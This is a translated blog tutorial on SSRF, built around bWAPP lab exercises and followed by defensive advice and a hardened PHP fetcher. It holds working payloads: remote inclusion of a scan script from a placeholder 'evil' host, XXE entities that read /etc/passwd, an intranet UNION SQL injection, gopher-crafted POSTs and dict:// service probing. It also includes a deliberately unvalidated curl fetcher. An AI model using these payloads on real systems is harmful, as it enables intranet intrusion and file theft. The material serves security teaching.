SSRF (Server-Side Request Forgery) vulnerability: offensive and defensive practice and prevention methods

Offensive and defensive practice and prevention methods

bWAPP provides three small experiments that illustrate typical SSRF usage scenarios.

Task 1: Use remote file inclusion for port scanning (intranet detection)

Click Port Scan in Task 1 to obtain a port-scan script. You only need to include that script remotely and pass the host to be scanned as the ip parameter. The next step is to use the Remote & Local File Inclusion (RFI / LFI) vulnerability in bWAPP to execute the port-scan script.
In bWAPP, choose the bug Remote & Local File Inclusion (RFI / LFI), set the security level to low, and click Hack to enter the Remote & Local File Inclusion (RFI / LFI) exercise. It has a module for selecting the language. Observing the parameters of the GET request shows a typical file-inclusion issue: language=lang_en.php
GET request: http://192.168.163.157/bWAPP/rlfi.php?language=lang_en.php&action=go
Use the following payload to remotely include and execute the scan script, which detects the ports and services of an intranet host:

POST: http://xxx.xxx.xxx/evil/ssrf-1.txt&action=go
POST DATA: ip=192.168.163.159
Here xxx.xxx.xxx (192.168.163.1) is the address that hosts the scan script and 192.168.163.159 is the target host to be scanned; the xxx.xxx.xxx host does not need to have access to the scanned address. POST is used to submit the target host IP so that the request is easy to distinguish when viewing the traffic; the result is returned after the scan completes.

Task 2: Use XXE to get the contents of sensitive files (file reading)

First click Access in Task 2 to obtain the XXE exploitation script, http://xxx.xxx.xxx/bWAPP/xxe-1.php, then open the XML External Entity Attacks (XXE) exercise environment, use Burp Suite to capture the request, and send it to Repeater for testing.
For the XXE background knowledge used in this test, refer to the article http://mp.weixin.qq.com/s/Yt7s-OoGMilCs-Yvyjl1xA.
Use the http protocol to read the content of /bWAPP/robots.txt:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [ <!ENTITY bWAPP SYSTEM "http://localhost/1/bwapp/robots.txt"> ]>
<reset>
  <login>&bWAPP;</login>
  <secret>blah</secret>
</reset>

(Line by line: the XML version declaration; the DTD that defines the root element and an external entity that reads the file; the login element whose entity reference outputs the file content.)

php://filter/read=convert.base64-encode/resource=http://192.168.0.67/1/bwapp/passwords/heroes.xml
Use the php:// protocol to obtain the base64-encoded content of /bWAPP/passwords/heroes.xml.

Use the file protocol to read the content of /etc/passwd on the bWAPP host:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [ <!ENTITY bWAPP SYSTEM "file:///etc/passwd"> ]>
<reset>
  <login>&bWAPP;</login>
  <secret>blah</secret>
</reset>

If the target file contains special characters, the XML parser reports an error when the entity is expanded; in that case use the php://filter encoding shown above to bypass the problem.

Task 3: Use XXE for intranet SQL injection

This task exploits a SQL injection vulnerability on an intranet site. For example, if host 192.168.163.150 has an injection vulnerability, you can send the following payload. SSRF can be used in this way to exploit SQL injection, and of course also Struts2 and other vulnerabilities.

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
  <!ENTITY bWAPP SYSTEM "http://192.168.163.150/news.php?newsid=-11+union+select+1,user()">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>

Extending SSRF knowledge

The above describes the general usage of SSRF: the http, file and php protocols are used for intranet detection, file reading and vulnerability exploitation. The following discussion extends that knowledge. Recall that all the uses above are performed by sending GET requests. So consider: what if the vulnerability of the internal site lies in a parameter of a POST request, or in a field of the request header? How should the SSRF request be constructed to exploit it?

Building the experimental target machine

As the table above shows, using the gopher protocol in PHP requires curl support (curl also supports many other protocols). First prepare a LAMP environment. If PHP on Ubuntu does not have the curl extension, install it with the following commands:
sudo apt-get install php5-curl
sudo service apache2 restart
Then write the following test code; the user-controllable input point is $_GET['url'].

<?php
// Create a new cURL resource
$ch = curl_init();
// Set the URL (taken directly from user input) and the related options
curl_setopt($ch, CURLOPT_URL, $_GET['url']);
curl_setopt($ch, CURLOPT_HEADER, false);
// Fetch the URL and pass the response to the browser
curl_exec($ch);
// Close the cURL resource and free system resources
curl_close($ch);
?>

Using the file protocol

Request http://192.168.163.150/test.php?url=file:///etc/passwd to read a sensitive file.

Using the gopher protocol

In SSRF exploitation, the gopher protocol is known as the all-purpose protocol. Gopher appeared earlier than HTTP and is rarely used today, but in SSRF exploitation it is universal, because gopher can be used to send request packets of arbitrary format; this solves the problem of the vulnerable point not being in a GET parameter.
Basic protocol format:
URL: gopher://<host>:<port>/<gopher-path>

The following request sends a POST request in which the parameter cmd has the value balabal. When constructing the gopher request, the carriage return and line feed must be URL-encoded twice, i.e. %250d%250a:

http://192.168.0.100/ssrf1.php?url=gopher://192.168.0.105:8080/_POST%20/test.php%20HTTP/1.1%250d%250aHost:%20192.168.0.105:8080%250d%250aUser-Agent:%20curl/7.43.0%250d%250aAccept:%20*/*%250d%250aContent-Type:%20application/x-www-form-urlencoded%250d%250a%250d%250aid=1

At this point the request can be found in access.log on host 192.168.0.105.
You can also use a network packet-analysis tool (Burp) to capture the HTTP data in the TCP traffic. Because gopher can construct arbitrary HTTP request packets, it plays the all-purpose role in SSRF exploitation. For specific attack methods, see:
https://blog.chaitin.cn/gopher-attack-surfaces/

Using the dict protocol

The dict protocol is a dictionary server protocol, normally used to let clients access additional dictionary sources. However, if the dict protocol can be used in an SSRF, you can easily obtain information such as the version of the service running on a port of the target server.
For example, requesting http://192.168.163.150/test.php?url=dict://192.168.163.1:3306/info
reveals that MySQL 5.5.55 is running on port 3306 of the target host.

**For other extended SSRF knowledge, see: http://www.anquan.us/static/drops/web-7550.html**

SSRF protection methods

1. Protective measures

(Blacklist)
(1) Filter the private address ranges 10.0.0.0/8, 172.16.0.0/12 and 192.168.0.0/16, localhost, and IPv6 addresses
(2) Filter the dangerous schemes file:///, dict://, gopher:// and ftp://
(3) Validate the returned content
(4) Require authentication on intranet services (Memcached, Redis, Elasticsearch and MongoDB)

2. Best protection

(1) Use an address whitelist
(2) Validate the returned content
(3) When Internet resources are needed (for example, loading external images in a forum post) and a whitelist cannot be used: first disable CURLOPT_FOLLOWLOCATION; then resolve the domain name to an IP address and filter internal IPs; finally check whether the returned content matches the expected content
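The following added example (written for this page; it is not code from the original article or from bWAPP) rewrites the test.php fetcher above according to the "best protection" list: an http/https scheme allow-list, resolution of the host name followed by filtering of private and reserved addresses, CURLOPT_FOLLOWLOCATION disabled, curl restricted to http/https via CURLOPT_PROTOCOLS, the validated IP pinned with CURLOPT_RESOLVE, and a check that the response is the expected content type. It assumes PHP 7 or later with the curl extension; the function names safe_fetch and is_public_ip are the example's own, and the image Content-Type allow-list reflects the external-image use case mentioned in point (3).

```php
<?php
// Added example (not from the original article): hardened replacement for the
// vulnerable test.php above. Helper names are this example's own.

function is_public_ip(string $ip): bool
{
    // NO_PRIV_RANGE rejects 10/8, 172.16/12, 192.168/16 and fc00::/7;
    // NO_RES_RANGE rejects 0/8, 127/8, 169.254/16, 240/4, ::1, fe80::/10 etc.
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

function safe_fetch(string $url, array $allowedTypes = ['image/']): array
{
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return ['ok' => false, 'error' => 'malformed URL'];
    }
    // Scheme allow-list: rejects file://, dict://, gopher://, php://, ftp:// ...
    $scheme = strtolower($parts['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        return ['ok' => false, 'error' => "scheme $scheme not allowed"];
    }
    $host = $parts['host'];
    $port = $parts['port'] ?? ($scheme === 'https' ? 443 : 80);

    // Resolve the name ourselves and filter the *resolved* address: names such
    // as "localhost" or an attacker-controlled DNS record may point inside.
    // gethostbynamel() returns IPv4 only, so IPv6-only names are rejected here.
    $ips = filter_var($host, FILTER_VALIDATE_IP) ? [$host] : gethostbynamel($host);
    if (!$ips) {
        return ['ok' => false, 'error' => 'DNS resolution failed'];
    }
    foreach ($ips as $ip) {
        if (!is_public_ip($ip)) {
            return ['ok' => false, 'error' => "resolved to internal address $ip"];
        }
    }

    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        // Never follow redirects: a 302 to http://127.0.0.1/ would bypass the checks.
        CURLOPT_FOLLOWLOCATION => false,
        // Restrict curl itself to http/https, whatever parse_url accepted.
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        // Pin the connection to the IP we validated, so a DNS answer that changes
        // between our lookup and curl's own lookup (DNS rebinding) has no effect.
        CURLOPT_RESOLVE        => ["$host:$port:{$ips[0]}"],
        CURLOPT_IPRESOLVE      => CURL_IPRESOLVE_V4,
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT        => 10,
        CURLOPT_MAXFILESIZE    => 5 * 1024 * 1024,
    ]);
    $body        = curl_exec($ch);
    $status      = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
    $contentType = (string) curl_getinfo($ch, CURLINFO_CONTENT_TYPE);
    $err         = curl_error($ch);
    curl_close($ch);

    if ($body === false) {
        return ['ok' => false, 'error' => "fetch failed: $err"];
    }
    // Validate the returned content: we expected an image, not a service banner
    // or an intranet page. Only the Content-Type prefix is checked here.
    $typeOk = false;
    foreach ($allowedTypes as $prefix) {
        if (stripos($contentType, $prefix) === 0) { $typeOk = true; break; }
    }
    if (!$typeOk) {
        return ['ok' => false, 'error' => "unexpected content type '$contentType'"];
    }
    return ['ok' => true, 'status' => $status,
            'content_type' => $contentType, 'body' => $body];
}

// Drop-in use in place of test.php: the input point is still $_GET['url'].
if (PHP_SAPI !== 'cli') {
    $result = safe_fetch($_GET['url'] ?? '');
    if (!$result['ok']) {
        http_response_code(400);
        echo 'blocked: ' . htmlspecialchars($result['error']);
        exit;
    }
    header('Content-Type: ' . $result['content_type']);
    echo $result['body'];
}
```

The pinning step matters more than it looks: resolving the name once for the check and then letting curl resolve it a second time leaves a window in which the DNS answer can change, so the validated address is handed to curl explicitly. Checking the response Content-Type is the simplest form of "validate the returned content"; for a real image proxy, decoding the bytes with an image library before serving them is the stronger check.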


Origin blog.csdn.net/weixin_43079958/article/details/105442833